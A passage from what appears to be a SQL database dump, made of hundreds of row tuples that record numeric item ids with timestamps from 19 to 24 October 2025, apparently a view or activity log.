20:53:41'),(92614,1612,1,'2025-10-19','2025-10-19 21:03:45'),(92615,5128,1,'2025-10-19','2025-10-19 21:11:27'),(92616,5128,1,'2025-10-19','2025-10-19 21:11:57'),(92617,5128,1,'2025-10-19','2025-10-19 21:12:50'),(92618,1582,1,'2025-10-19','2025-10-19 22:18:43'),(92619,1582,1,'2025-10-19','2025-10-19 22:33:30'),(92620,2165,1,'2025-10-19','2025-10-19 23:24:25'),(92621,474,1,'2025-10-19','2025-10-19 23:30:59'),(92622,84,1,'2025-10-20','2025-10-20 00:10:54'),(92623,5507,1,'2025-10-20','2025-10-20 00:38:09'),(92624,4608,1,'2025-10-20','2025-10-20 00:42:02'),(92625,3055,1,'2025-10-20','2025-10-20 00:48:01'),(92626,474,1,'2025-10-20','2025-10-20 00:50:37'),(92627,2971,1,'2025-10-20','2025-10-20 00:59:56'),(92628,3102,1,'2025-10-20','2025-10-20 02:12:28'),(92629,91,1,'2025-10-20','2025-10-20 02:58:30'),(92630,4573,1,'2025-10-20','2025-10-20 03:09:15'),(92631,2297,1,'2025-10-20','2025-10-20 03:31:46'),(92632,1582,1,'2025-10-20','2025-10-20 04:27:38'),(92633,474,1,'2025-10-20','2025-10-20 04:40:17'),(92634,474,1,'2025-10-20','2025-10-20 04:40:32'),(92635,474,1,'2025-10-20','2025-10-20 04:40:48'),(92636,474,1,'2025-10-20','2025-10-20 04:41:21'),(92637,1544,1,'2025-10-20','2025-10-20 06:22:53'),(92638,3290,1,'2025-10-20','2025-10-20 07:05:53'),(92639,4660,1,'2025-10-20','2025-10-20 07:42:37'),(92640,5570,1,'2025-10-20','2025-10-20 08:57:36'),(92641,4888,1,'2025-10-20','2025-10-20 09:52:39'),(92642,5062,1,'2025-10-20','2025-10-20 10:25:26'),(92643,5454,1,'2025-10-20','2025-10-20 10:30:07'),(92644,3267,1,'2025-10-20','2025-10-20 11:04:23'),(92645,3267,1,'2025-10-20','2025-10-20 11:04:27'),(92646,68,1,'2025-10-20','2025-10-20 11:05:03'),(92647,68,1,'2025-10-20','2025-10-20 11:24:44'),(92648,4950,1,'2025-10-20','2025-10-20 11:50:49'),(92649,5400,1,'2025-10-20','2025-10-20 11:56:54'),(92650,5593,1,'2025-10-20','2025-10-20 13:26:59'),(92651,3117,1,'2025-10-20','2025-10-20 13:56:47'),(92652,5409,1,'2025-10-20','2025-10-20 14:03:24'),(92653,5441,1,'2025-10-20','2025-10-20 14:04:15'),(92654,5420,1,'2025-10-20','2025-10-20 14:27:44'),(92655,4983,1,'2025-10-20','2025-10-20 14:35:44'),(92656,5461,1,'2025-10-20','2025-10-20 14:41:07'),(92657,5412,1,'2025-10-20','2025-10-20 14:42:29'),(92658,5412,1,'2025-10-20','2025-10-20 14:44:08'),(92659,5464,1,'2025-10-20','2025-10-20 14:49:30'),(92660,5464,1,'2025-10-20','2025-10-20 14:49:32'),(92661,5412,1,'2025-10-20','2025-10-20 14:50:06'),(92662,110,1,'2025-10-20','2025-10-20 14:51:35'),(92663,4681,1,'2025-10-20','2025-10-20 14:52:18'),(92664,4888,1,'2025-10-20','2025-10-20 15:24:19'),(92665,4960,1,'2025-10-20','2025-10-20 15:43:54'),(92666,5146,1,'2025-10-20','2025-10-20 16:09:27'),(92667,3290,1,'2025-10-20','2025-10-20 16:14:59'),(92668,1608,1,'2025-10-20','2025-10-20 16:16:31'),(92669,68,1,'2025-10-20','2025-10-20 16:17:24'),(92670,68,1,'2025-10-20','2025-10-20 16:17:40'),(92671,5259,1,'2025-10-20','2025-10-20 16:22:31'),(92672,5259,1,'2025-10-20','2025-10-20 16:23:13'),(92673,5428,1,'2025-10-20','2025-10-20 16:35:47'),(92674,5157,1,'2025-10-20','2025-10-20 16:39:07'),(92675,5464,1,'2025-10-20','2025-10-20 16:46:32'),(92676,1766,1,'2025-10-20','2025-10-20 16:50:58'),(92677,3307,1,'2025-10-20','2025-10-20 17:16:01'),(92678,3096,1,'2025-10-20','2025-10-20 17:25:05'),(92679,5433,1,'2025-10-20','2025-10-20 17:25:56'),(92680,5457,1,'2025-10-20','2025-10-20 17:34:37'),(92681,5400,1,'2025-10-20','2025-10-20 17:48:12'),(92682,4400,1,'2025-10-20','2025-10-20 17:55:13'),(92683,5409,1,'2025-10-20','2025-10-20 18:04:53'),(92684,5125,1,'2025-10-20','2025-10-20 18:16:52'),(92685,4977,1,'2025-10-20','2025-10-20 18:29:59'),(92686,5492,1,'2025-10-20','2025-10-20 18:56:25'),(92687,5464,1,'2025-10-20','2025-10-20 19:01:17'),(92688,4712,1,'2025-10-20','2025-10-20 19:02:25'),(92689,5326,1,'2025-10-20','2025-10-20 19:16:07'),(92690,474,1,'2025-10-20','2025-10-20 19:25:48'),(92691,76,1,'2025-10-20','2025-10-20 19:26:15'),(92692,76,1,'2025-10-20','2025-10-20 19:28:04'),(92693,474,1,'2025-10-20','2025-10-20 19:28:29'),(92694,5062,1,'2025-10-20','2025-10-20 19:30:56'),(92695,2904,1,'2025-10-20','2025-10-20 19:46:49'),(92696,5276,1,'2025-10-20','2025-10-20 19:51:46'),(92697,4412,1,'2025-10-20','2025-10-20 20:19:50'),(92698,5128,1,'2025-10-20','2025-10-20 20:39:18'),(92699,5128,1,'2025-10-20','2025-10-20 21:38:54'),(92700,5128,1,'2025-10-20','2025-10-20 21:39:57'),(92701,5128,1,'2025-10-20','2025-10-20 21:43:55'),(92702,5128,1,'2025-10-20','2025-10-20 21:44:33'),(92703,5128,1,'2025-10-20','2025-10-20 21:57:58'),(92704,3267,1,'2025-10-20','2025-10-20 22:05:55'),(92705,1722,1,'2025-10-20','2025-10-20 22:22:52'),(92706,3691,1,'2025-10-20','2025-10-20 23:17:21'),(92707,4612,1,'2025-10-20','2025-10-20 23:39:42'),(92708,487,1,'2025-10-20','2025-10-20 23:40:58'),(92709,1770,1,'2025-10-20','2025-10-20 23:48:10'),(92710,4950,1,'2025-10-20','2025-10-20 23:55:43'),(92711,5530,1,'2025-10-21','2025-10-21 00:13:25'),(92712,474,1,'2025-10-21','2025-10-21 00:14:22'),(92713,5492,1,'2025-10-21','2025-10-21 01:15:51'),(92714,5326,1,'2025-10-21','2025-10-21 02:04:41'),(92715,5467,1,'2025-10-21','2025-10-21 02:19:09'),(92716,1728,1,'2025-10-21','2025-10-21 02:31:22'),(92717,5163,1,'2025-10-21','2025-10-21 03:31:38'),(92718,4977,1,'2025-10-21','2025-10-21 03:48:03'),(92719,91,1,'2025-10-21','2025-10-21 04:09:12'),(92720,5163,1,'2025-10-21','2025-10-21 04:29:59'),(92721,5163,1,'2025-10-21','2025-10-21 04:42:39'),(92722,5033,1,'2025-10-21','2025-10-21 04:44:03'),(92723,4341,1,'2025-10-21','2025-10-21 05:30:35'),(92724,2989,1,'2025-10-21','2025-10-21 06:17:03'),(92725,1745,1,'2025-10-21','2025-10-21 06:33:35'),(92726,4622,1,'2025-10-21','2025-10-21 07:06:25'),(92727,4612,1,'2025-10-21','2025-10-21 09:19:11'),(92728,5363,1,'2025-10-21','2025-10-21 09:37:00'),(92729,87,1,'2025-10-21','2025-10-21 09:38:09'),(92730,84,1,'2025-10-21','2025-10-21 09:38:41'),(92731,76,1,'2025-10-21','2025-10-21 09:38:55'),(92732,2704,1,'2025-10-21','2025-10-21 11:26:18'),(92733,5561,1,'2025-10-21','2025-10-21 11:38:06'),(92734,5557,1,'2025-10-21','2025-10-21 12:16:58'),(92735,4944,1,'2025-10-21','2025-10-21 12:36:04'),(92736,80,1,'2025-10-21','2025-10-21 12:37:40'),(92737,68,1,'2025-10-21','2025-10-21 12:40:24'),(92738,5441,1,'2025-10-21','2025-10-21 12:58:10'),(92739,4618,1,'2025-10-21','2025-10-21 13:15:06'),(92740,2775,1,'2025-10-21','2025-10-21 13:17:37'),(92741,3724,1,'2025-10-21','2025-10-21 13:39:53'),(92742,4944,1,'2025-10-21','2025-10-21 13:40:48'),(92743,72,1,'2025-10-21','2025-10-21 13:55:52'),(92744,72,1,'2025-10-21','2025-10-21 14:09:26'),(92745,4697,1,'2025-10-21','2025-10-21 14:23:34'),(92746,469,1,'2025-10-21','2025-10-21 14:38:05'),(92747,2804,1,'2025-10-21','2025-10-21 14:38:50'),(92748,4950,1,'2025-10-21','2025-10-21 15:15:54'),(92749,5567,1,'2025-10-21','2025-10-21 15:37:57'),(92750,5605,1,'2025-10-21','2025-10-21 16:07:02'),(92751,2309,1,'2025-10-21','2025-10-21 16:32:50'),(92752,3097,1,'2025-10-21','2025-10-21 16:40:54'),(92753,1582,1,'2025-10-21','2025-10-21 16:44:36'),(92754,5425,1,'2025-10-21','2025-10-21 16:53:12'),(92755,2704,1,'2025-10-21','2025-10-21 17:03:01'),(92756,2704,1,'2025-10-21','2025-10-21 17:05:36'),(92757,5415,1,'2025-10-21','2025-10-21 17:10:55'),(92758,74,1,'2025-10-21','2025-10-21 18:34:55'),(92759,87,1,'2025-10-21','2025-10-21 18:40:44'),(92760,76,1,'2025-10-21','2025-10-21 18:51:32'),(92761,68,1,'2025-10-21','2025-10-21 18:52:30'),(92762,5310,1,'2025-10-21','2025-10-21 19:53:18'),(92763,2813,1,'2025-10-21','2025-10-21 19:56:18'),(92764,5128,1,'2025-10-21','2025-10-21 20:26:49'),(92765,5128,1,'2025-10-21','2025-10-21 20:27:01'),(92766,5363,1,'2025-10-21','2025-10-21 20:27:03'),(92767,5128,1,'2025-10-21','2025-10-21 20:27:53'),(92768,5397,1,'2025-10-21','2025-10-21 20:31:19'),(92769,5515,1,'2025-10-21','2025-10-21 20:50:07'),(92770,5128,1,'2025-10-21','2025-10-21 21:02:52'),(92771,5593,1,'2025-10-21','2025-10-21 21:17:07'),(92772,4556,1,'2025-10-21','2025-10-21 22:11:29'),(92773,91,1,'2025-10-21','2025-10-21 22:57:50'),(92774,5400,1,'2025-10-21','2025-10-21 23:40:12'),(92775,4529,1,'2025-10-21','2025-10-21 23:46:16'),(92776,4944,1,'2025-10-21','2025-10-21 23:55:12'),(92777,4400,1,'2025-10-22','2025-10-22 00:24:45'),(92778,4950,1,'2025-10-22','2025-10-22 00:33:57'),(92779,5346,1,'2025-10-22','2025-10-22 01:14:38'),(92780,5428,1,'2025-10-22','2025-10-22 02:12:33'),(92781,5420,1,'2025-10-22','2025-10-22 02:29:33'),(92782,4977,1,'2025-10-22','2025-10-22 03:28:37'),(92783,91,1,'2025-10-22','2025-10-22 04:52:55'),(92784,72,1,'2025-10-22','2025-10-22 05:42:21'),(92785,108,1,'2025-10-22','2025-10-22 05:42:31'),(92786,468,1,'2025-10-22','2025-10-22 05:42:48'),(92787,84,1,'2025-10-22','2025-10-22 05:43:00'),(92788,474,1,'2025-10-22','2025-10-22 05:43:14'),(92789,2503,1,'2025-10-22','2025-10-22 05:43:32'),(92790,1877,1,'2025-10-22','2025-10-22 05:43:41'),(92791,335,1,'2025-10-22','2025-10-22 05:44:14'),(92792,5605,1,'2025-10-22','2025-10-22 05:44:30'),(92793,5598,1,'2025-10-22','2025-10-22 05:44:44'),(92794,2904,1,'2025-10-22','2025-10-22 05:45:42'),(92795,91,1,'2025-10-22','2025-10-22 05:45:59'),(92796,5593,1,'2025-10-22','2025-10-22 05:46:25'),(92797,5601,1,'2025-10-22','2025-10-22 05:47:08'),(92798,1872,1,'2025-10-22','2025-10-22 05:47:26'),(92799,76,1,'2025-10-22','2025-10-22 05:47:34'),(92800,74,1,'2025-10-22','2025-10-22 05:47:47'),(92801,4930,1,'2025-10-22','2025-10-22 05:48:00'),(92802,473,1,'2025-10-22','2025-10-22 05:48:11'),(92803,80,1,'2025-10-22','2025-10-22 05:48:21'),(92804,68,1,'2025-10-22','2025-10-22 05:48:54'),(92805,470,1,'2025-10-22','2025-10-22 05:49:04'),(92806,89,1,'2025-10-22','2025-10-22 05:49:20'),(92807,1870,1,'2025-10-22','2025-10-22 05:49:40'),(92808,487,1,'2025-10-22','2025-10-22 05:49:53'),(92809,87,1,'2025-10-22','2025-10-22 05:50:12'),(92810,72,1,'2025-10-22','2025-10-22 05:50:29'),(92811,5553,1,'2025-10-22','2025-10-22 05:50:50'),(92812,5495,1,'2025-10-22','2025-10-22 05:51:04'),(92813,5588,1,'2025-10-22','2025-10-22 05:51:07'),(92814,72,1,'2025-10-22','2025-10-22 05:51:17'),(92815,5526,1,'2025-10-22','2025-10-22 05:51:58'),(92816,72,1,'2025-10-22','2025-10-22 05:52:10'),(92817,5549,1,'2025-10-22','2025-10-22 05:52:28'),(92818,5545,1,'2025-10-22','2025-10-22 05:52:41'),(92819,5573,1,'2025-10-22','2025-10-22 05:52:56'),(92820,5530,1,'2025-10-22','2025-10-22 05:53:08'),(92821,72,1,'2025-10-22','2025-10-22 05:53:20'),(92822,5557,1,'2025-10-22','2025-10-22 05:54:03'),(92823,5539,1,'2025-10-22','2025-10-22 05:54:36'),(92824,5536,1,'2025-10-22','2025-10-22 05:54:48'),(92825,469,1,'2025-10-22','2025-10-22 05:54:58'),(92826,467,1,'2025-10-22','2025-10-22 05:55:10'),(92827,3691,1,'2025-10-22','2025-10-22 05:55:36'),(92828,3664,1,'2025-10-22','2025-10-22 05:56:41'),(92829,3694,1,'2025-10-22','2025-10-22 05:56:55'),(92830,476,1,'2025-10-22','2025-10-22 05:57:05'),(92831,5578,1,'2025-10-22','2025-10-22 05:57:52'),(92832,5582,1,'2025-10-22','2025-10-22 05:58:14'),(92833,5561,1,'2025-10-22','2025-10-22 05:58:57'),(92834,5515,1,'2025-10-22','2025-10-22 05:59:06'),(92835,5512,1,'2025-10-22','2025-10-22 05:59:53'),(92836,5585,1,'2025-10-22','2025-10-22 06:00:01'),(92837,5570,1,'2025-10-22','2025-10-22 06:01:02'),(92838,5567,1,'2025-10-22','2025-10-22 06:01:20'),(92839,102,1,'2025-10-22','2025-10-22 06:02:31'),(92840,5378,1,'2025-10-22','2025-10-22 06:02:57'),(92841,5058,1,'2025-10-22','2025-10-22 06:03:21'),(92842,5326,1,'2025-10-22','2025-10-22 06:03:33'),(92843,5062,1,'2025-10-22','2025-10-22 06:04:11'),(92844,5415,1,'2025-10-22','2025-10-22 06:05:47'),(92845,5146,1,'2025-10-22','2025-10-22 06:06:05'),(92846,5248,1,'2025-10-22','2025-10-22 06:06:22'),(92847,5330,1,'2025-10-22','2025-10-22 06:06:35'),(92848,5071,1,'2025-10-22','2025-10-22 06:07:07'),(92849,5374,1,'2025-10-22','2025-10-22 06:07:41'),(92850,5383,1,'2025-10-22','2025-10-22 06:07:53'),(92851,5259,1,'2025-10-22','2025-10-22 06:08:08'),(92852,5067,1,'2025-10-22','2025-10-22 06:08:24'),(92853,5153,1,'2025-10-22','2025-10-22 06:08:48'),(92854,5363,1,'2025-10-22','2025-10-22 06:08:59'),(92855,5080,1,'2025-10-22','2025-10-22 06:10:05'),(92856,5140,1,'2025-10-22','2025-10-22 06:10:48'),(92857,5076,1,'2025-10-22','2025-10-22 06:11:16'),(92858,5264,1,'2025-10-22','2025-10-22 06:11:32'),(92859,5157,1,'2025-10-22','2025-10-22 06:11:51'),(92860,1582,1,'2025-10-22','2025-10-22 06:12:51'),(92861,2503,1,'2025-10-22','2025-10-22 06:13:07'),(92862,4941,1,'2025-10-22','2025-10-22 06:13:12'),(92863,4911,1,'2025-10-22','2025-10-22 06:13:25'),(92864,4938,1,'2025-10-22','2025-10-22 06:13:42'),(92865,4966,1,'2025-10-22','2025-10-22 06:13:57'),(92866,4950,1,'2025-10-22','2025-10-22 06:14:05'),(92867,4963,1,'2025-10-22','2025-10-22 06:14:19'),(92868,4944,1,'2025-10-22','2025-10-22 06:14:30'),(92869,4960,1,'2025-10-22','2025-10-22 06:14:39'),(92870,472,1,'2025-10-22','2025-10-22 06:14:50'),(92871,2411,1,'2025-10-22','2025-10-22 06:15:04'),(92872,2420,1,'2025-10-22','2025-10-22 06:15:14'),(92873,2410,1,'2025-10-22','2025-10-22 06:15:27'),(92874,2419,1,'2025-10-22','2025-10-22 06:15:40'),(92875,2395,1,'2025-10-22','2025-10-22 06:15:49'),(92876,471,1,'2025-10-22','2025-10-22 06:16:01'),(92877,1608,1,'2025-10-22','2025-10-22 06:16:11'),(92878,1584,1,'2025-10-22','2025-10-22 06:16:26'),(92879,1602,1,'2025-10-22','2025-10-22 06:16:40'),(92880,1596,1,'2025-10-22','2025-10-22 06:16:54'),(92881,1588,1,'2025-10-22','2025-10-22 06:17:08'),(92882,1590,1,'2025-10-22','2025-10-22 06:17:58'),(92883,1604,1,'2025-10-22','2025-10-22 06:18:08'),(92884,1606,1,'2025-10-22','2025-10-22 06:18:23'),(92885,1592,1,'2025-10-22','2025-10-22 06:18:36'),(92886,1598,1,'2025-10-22','2025-10-22 06:18:50'),(92887,1586,1,'2025-10-22','2025-10-22 06:19:05'),(92888,89,1,'2025-10-22','2025-10-22 06:19:20'),(92889,1594,1,'2025-10-22','2025-10-22 06:19:33'),(92890,1600,1,'2025-10-22','2025-10-22 06:19:46'),(92891,1544,1,'2025-10-22','2025-10-22 06:19:58'),(92892,89,1,'2025-10-22','2025-10-22 06:20:10'),(92893,488,1,'2025-10-22','2025-10-22 06:20:25'),(92894,486,1,'2025-10-22','2025-10-22 06:20:40'),(92895,477,1,'2025-10-22','2025-10-22 06:20:53'),(92896,482,1,'2025-10-22','2025-10-22 06:21:29'),(92897,485,1,'2025-10-22','2025-10-22 06:21:59'),(92898,484,1,'2025-10-22','2025-10-22 06:22:13'),(92899,478,1,'2025-10-22','2025-10-22 06:22:42'),(92900,481,1,'2025-10-22','2025-10-22 06:22:59'),(92901,479,1,'2025-10-22','2025-10-22 06:23:13'),(92902,480,1,'2025-10-22','2025-10-22 06:23:23'),(92903,483,1,'2025-10-22','2025-10-22 06:24:04'),(92904,5005,1,'2025-10-22','2025-10-22 06:24:37'),(92905,4971,1,'2025-10-22','2025-10-22 06:24:47'),(92906,5492,1,'2025-10-22','2025-10-22 06:29:30'),(92907,4587,1,'2025-10-22','2025-10-22 06:43:03'),(92908,1608,1,'2025-10-22','2025-10-22 07:19:10'),(92909,4950,1,'2025-10-22','2025-10-22 07:42:58'),(92910,1582,1,'2025-10-22','2025-10-22 08:03:28'),(92911,1602,1,'2025-10-22','2025-10-22 09:24:13'),(92912,5409,1,'2025-10-22','2025-10-22 10:36:59'),(92913,1724,1,'2025-10-22','2025-10-22 11:03:32'),(92914,76,1,'2025-10-22','2025-10-22 11:10:48'),(92915,3249,1,'2025-10-22','2025-10-22 11:21:42'),(92916,4950,1,'2025-10-22','2025-10-22 11:25:24'),(92917,5578,1,'2025-10-22','2025-10-22 13:17:19'),(92918,1728,1,'2025-10-22','2025-10-22 14:28:10'),(92919,5264,1,'2025-10-22','2025-10-22 14:37:42'),(92920,5512,1,'2025-10-22','2025-10-22 14:38:08'),(92921,5454,1,'2025-10-22','2025-10-22 14:55:30'),(92922,4950,1,'2025-10-22','2025-10-22 15:43:12'),(92923,5441,1,'2025-10-22','2025-10-22 15:46:13'),(92924,4966,1,'2025-10-22','2025-10-22 16:06:31'),(92925,5570,1,'2025-10-22','2025-10-22 16:30:13'),(92926,467,1,'2025-10-22','2025-10-22 16:36:14'),(92927,5502,1,'2025-10-22','2025-10-22 17:14:27'),(92928,3307,1,'2025-10-22','2025-10-22 17:14:35'),(92929,5601,1,'2025-10-22','2025-10-22 17:19:36'),(92930,3069,1,'2025-10-22','2025-10-22 17:21:33'),(92931,3752,1,'2025-10-22','2025-10-22 17:27:02'),(92932,5512,1,'2025-10-22','2025-10-22 17:35:50'),(92933,5457,1,'2025-10-22','2025-10-22 17:36:02'),(92934,4660,1,'2025-10-22','2025-10-22 17:37:58'),(92935,5454,1,'2025-10-22','2025-10-22 17:41:20'),(92936,3774,1,'2025-10-22','2025-10-22 17:41:28'),(92937,5570,1,'2025-10-22','2025-10-22 17:42:08'),(92938,5425,1,'2025-10-22','2025-10-22 17:49:09'),(92939,5578,1,'2025-10-22','2025-10-22 17:51:40'),(92940,5489,1,'2025-10-22','2025-10-22 17:56:40'),(92941,4722,1,'2025-10-22','2025-10-22 18:00:30'),(92942,5406,1,'2025-10-22','2025-10-22 18:03:45'),(92943,3117,1,'2025-10-22','2025-10-22 18:04:08'),(92944,2904,1,'2025-10-22','2025-10-22 18:04:30'),(92945,3038,1,'2025-10-22','2025-10-22 18:08:33'),(92946,5561,1,'2025-10-22','2025-10-22 18:08:39'),(92947,5441,1,'2025-10-22','2025-10-22 18:08:44'),(92948,5125,1,'2025-10-22','2025-10-22 18:08:49'),(92949,5567,1,'2025-10-22','2025-10-22 18:13:50'),(92950,5436,1,'2025-10-22','2025-10-22 18:31:08'),(92951,2395,1,'2025-10-22','2025-10-22 18:32:54'),(92952,5420,1,'2025-10-22','2025-10-22 18:36:22'),(92953,4983,1,'2025-10-22','2025-10-22 18:39:32'),(92954,5461,1,'2025-10-22','2025-10-22 18:44:06'),(92955,5464,1,'2025-10-22','2025-10-22 18:53:25'),(92956,110,1,'2025-10-22','2025-10-22 18:53:41'),(92957,4681,1,'2025-10-22','2025-10-22 18:53:49'),(92958,5567,1,'2025-10-22','2025-10-22 21:35:19'),(92959,5412,1,'2025-10-22','2025-10-22 22:15:02'),(92960,1766,1,'2025-10-22','2025-10-22 22:30:06'),(92961,4416,1,'2025-10-22','2025-10-22 22:31:06'),(92962,5582,1,'2025-10-22','2025-10-22 22:47:20'),(92963,3090,1,'2025-10-22','2025-10-22 22:51:58'),(92964,1872,1,'2025-10-22','2025-10-22 23:01:53'),(92965,473,1,'2025-10-22','2025-10-22 23:01:55'),(92966,4373,1,'2025-10-22','2025-10-22 23:36:35'),(92967,4963,1,'2025-10-22','2025-10-22 23:57:14'),(92968,76,1,'2025-10-23','2025-10-23 03:11:24'),(92969,5425,1,'2025-10-23','2025-10-23 03:52:19'),(92970,5425,1,'2025-10-23','2025-10-23 03:52:56'),(92971,4883,1,'2025-10-23','2025-10-23 04:26:46'),(92972,3774,1,'2025-10-23','2025-10-23 04:27:44'),(92973,5067,1,'2025-10-23','2025-10-23 05:08:37'),(92974,91,1,'2025-10-23','2025-10-23 06:08:00'),(92975,5570,1,'2025-10-23','2025-10-23 06:20:55'),(92976,3479,1,'2025-10-23','2025-10-23 06:58:20'),(92977,3482,1,'2025-10-23','2025-10-23 07:32:15'),(92978,5522,1,'2025-10-23','2025-10-23 08:05:58'),(92979,473,1,'2025-10-23','2025-10-23 08:58:48'),(92980,473,1,'2025-10-23','2025-10-23 09:01:00'),(92981,474,1,'2025-10-23','2025-10-23 09:01:21'),(92982,5495,1,'2025-10-23','2025-10-23 09:21:10'),(92983,4963,1,'2025-10-23','2025-10-23 10:32:57'),(92984,1544,1,'2025-10-23','2025-10-23 10:34:29'),(92985,3438,1,'2025-10-23','2025-10-23 11:45:43'),(92986,4950,1,'2025-10-23','2025-10-23 12:02:59'),(92987,4837,1,'2025-10-23','2025-10-23 12:41:50'),(92988,473,1,'2025-10-23','2025-10-23 12:59:21'),(92989,4950,1,'2025-10-23','2025-10-23 13:05:14'),(92990,4950,1,'2025-10-23','2025-10-23 13:10:39'),(92991,68,1,'2025-10-23','2025-10-23 13:11:16'),(92992,4950,1,'2025-10-23','2025-10-23 13:11:49'),(92993,5522,1,'2025-10-23','2025-10-23 13:19:28'),(92994,4677,1,'2025-10-23','2025-10-23 13:29:05'),(92995,5573,1,'2025-10-23','2025-10-23 13:29:21'),(92996,2956,1,'2025-10-23','2025-10-23 13:30:01'),(92997,2809,1,'2025-10-23','2025-10-23 14:31:21'),(92998,91,1,'2025-10-23','2025-10-23 15:01:11'),(92999,5609,1,'2025-10-23','2025-10-23 15:01:47'),(93000,5609,1,'2025-10-23','2025-10-23 15:01:47'),(93001,5609,1,'2025-10-23','2025-10-23 15:02:58'),(93002,5609,1,'2025-10-23','2025-10-23 15:03:07'),(93003,5609,1,'2025-10-23','2025-10-23 15:05:55'),(93004,5609,1,'2025-10-23','2025-10-23 15:06:08'),(93005,5609,1,'2025-10-23','2025-10-23 15:20:15'),(93006,3063,1,'2025-10-23','2025-10-23 15:33:33'),(93007,5371,1,'2025-10-23','2025-10-23 15:55:56'),(93008,5489,1,'2025-10-23','2025-10-23 16:11:10'),(93009,5573,1,'2025-10-23','2025-10-23 16:25:26'),(93010,3498,1,'2025-10-23','2025-10-23 16:32:57'),(93011,3781,1,'2025-10-23','2025-10-23 16:34:36'),(93012,5489,1,'2025-10-23','2025-10-23 16:37:49'),(93013,3430,1,'2025-10-23','2025-10-23 17:33:07'),(93014,3069,1,'2025-10-23','2025-10-23 18:15:18'),(93015,80,1,'2025-10-23','2025-10-23 18:25:36'),(93016,5609,1,'2025-10-23','2025-10-23 18:31:39'),(93017,5495,1,'2025-10-23','2025-10-23 18:49:57'),(93018,5570,1,'2025-10-23','2025-10-23 19:09:51'),(93019,102,1,'2025-10-23','2025-10-23 19:30:29'),(93020,3735,1,'2025-10-23','2025-10-23 19:40:00'),(93021,5425,1,'2025-10-23','2025-10-23 19:55:41'),(93022,68,1,'2025-10-23','2025-10-23 19:57:30'),(93023,5578,1,'2025-10-23','2025-10-23 20:02:49'),(93024,5489,1,'2025-10-23','2025-10-23 20:11:43'),(93025,5593,1,'2025-10-23','2025-10-23 20:20:28'),(93026,4697,1,'2025-10-23','2025-10-23 20:45:19'),(93027,3117,1,'2025-10-23','2025-10-23 20:50:20'),(93028,2904,1,'2025-10-23','2025-10-23 20:55:53'),(93029,3038,1,'2025-10-23','2025-10-23 21:01:46'),(93030,3030,1,'2025-10-23','2025-10-23 21:08:05'),(93031,4977,1,'2025-10-23','2025-10-23 21:34:23'),(93032,2801,1,'2025-10-23','2025-10-23 21:45:17'),(93033,1544,1,'2025-10-23','2025-10-23 21:46:56'),(93034,4971,1,'2025-10-23','2025-10-23 21:51:16'),(93035,4645,1,'2025-10-23','2025-10-23 22:15:12'),(93036,3124,1,'2025-10-23','2025-10-23 22:22:25'),(93037,5461,1,'2025-10-23','2025-10-23 23:01:36'),(93038,1582,1,'2025-10-23','2025-10-23 23:27:25'),(93039,4776,1,'2025-10-23','2025-10-23 23:35:14'),(93040,5464,1,'2025-10-23','2025-10-23 23:51:02'),(93041,1582,1,'2025-10-23','2025-10-23 23:55:34'),(93042,5536,1,'2025-10-24','2025-10-24 00:34:48'),(93043,4950,1,'2025-10-24','2025-10-24 00:44:32'),(93044,5492,1,'2025-10-24','2025-10-24 00:58:59'),(93045,4326,1,'2025-10-24','2025-10-24 00:59:15'),(93046,5536,1,'2025-10-24','2025-10-24 01:03:00'),(93047,87,1,'2025-10-24','2025-10-24 02:20:29'),(93048,4382,1,'2025-10-24','2025-10-24 02:36:58'),(93049,4700,1,'2025-10-24','2025-10-24 02:47:57'),(93050,5271,1,'2025-10-24','2025-10-24 02:50:57'),(93051,5356,1,'2025-10-24','2025-10-24 03:08:56'),(93052,4776,1,'2025-10-24','2025-10-24 03:28:31'),(93053,4830,1,'2025-10-24','2025-10-24 03:42:34'),(93054,80,1,'2025-10-24','2025-10-24 03:59:22'),(93055,482,1,'2025-10-24','2025-10-24 04:09:02'),(93056,5609,1,'2025-10-24','2025-10-24 04:17:30'),(93057,482,1,'2025-10-24','2025-10-24 04:29:47'),(93058,5412,1,'2025-10-24','2025-10-24 04:31:50'),(93059,1582,1,'2025-10-24','2025-10-24 04:31:57'),(93060,2809,1,'2025-10-24','2025-10-24 04:40:33'),(93061,484,1,'2025-10-24','2025-10-24 05:15:06'),(93062,3030,1,'2025-10-24','2025-10-24 05:26:41'),(93063,4694,1,'2025-10-24','2025-10-24 05:38:12'),(93064,3124,1,'2025-10-24','2025-10-24 05:57:47'),(93065,91,1,'2025-10-24','2025-10-24 06:12:39'),(93066,5428,1,'2025-10-24','2025-10-24 06:12:50'),(93067,2775,1,'2025-10-24','2025-10-24 06:19:10'),(93068,479,1,'2025-10-24','2025-10-24 06:47:26'),(93069,4976,1,'2025-10-24','2025-10-24 07:22:02'),(93070,5515,1,'2025-10-24','2025-10-24 07:29:55'),(93071,3034,1,'2025-10-24','2025-10-24 07:33:36'),(93072,5609,1,'2025-10-24','2025-10-24 07:33:50'),(93073,3764,1,'2025-10-24','2025-10-24 07:42:32'),(93074,4524,1,'2025-10-24','2025-10-24 07:42:39'),(93075,4983,1,'2025-10-24','2025-10-24 08:19:42'),(93076,5397,1,'2025-10-24','2025-10-24 08:36:58'),(93077,4648,1,'2025-10-24','2025-10-24 08:39:06'),(93078,4722,1,'2025-10-24','2025-10-24 08:39:10'),(93079,89,1,'2025-10-24','2025-10-24 08:39:16'),(93080,3710,1,'2025-10-24','2025-10-24 08:41:53'),(93081,3714,1,'2025-10-24','2025-10-24 09:39:19'),(93082,4566,1,'2025-10-24','2025-10-24 09:39:29'),(93083,102,1,'2025-10-24','2025-10-24 09:42:13'),(93084,4657,1,'2025-10-24','2025-10-24 09:42:24'),(93085,80,1,'2025-10-24','2025-10-24 09:55:49'),(93086,4960,1,'2025-10-24','2025-10-24 09:57:06'),(93087,84,1,'2025-10-24','2025-10-24 09:59:02'),(93088,87,1,'2025-10-24','2025-10-24 09:59:30'),(93089,3438,1,'2025-10-24','2025-10-24 09:59:44'),(93090,89,1,'2025-10-24','2025-10-24 10:00:17'),(93091,4930,1,'2025-10-24','2025-10-24 10:00:27'),(93092,4960,1,'2025-10-24','2025-10-24 10:01:01'),(93093,68,1,'2025-10-24','2025-10-24 10:01:22'),(93094,76,1,'2025-10-24','2025-10-24 10:01:32'),(93095,68,1,'2025-10-24','2025-10-24 10:14:50'),(93096,5320,1,'2025-10-24','2025-10-24 10:39:45'),(93097,72,1,'2025-10-24','2025-10-24 10:40:13'),(93098,4685,1,'2025-10-24','2025-10-24 11:14:45'),(93099,1612,1,'2025-10-24','2025-10-24 11:16:03'),(93100,4275,1,'2025-10-24','2025-10-24 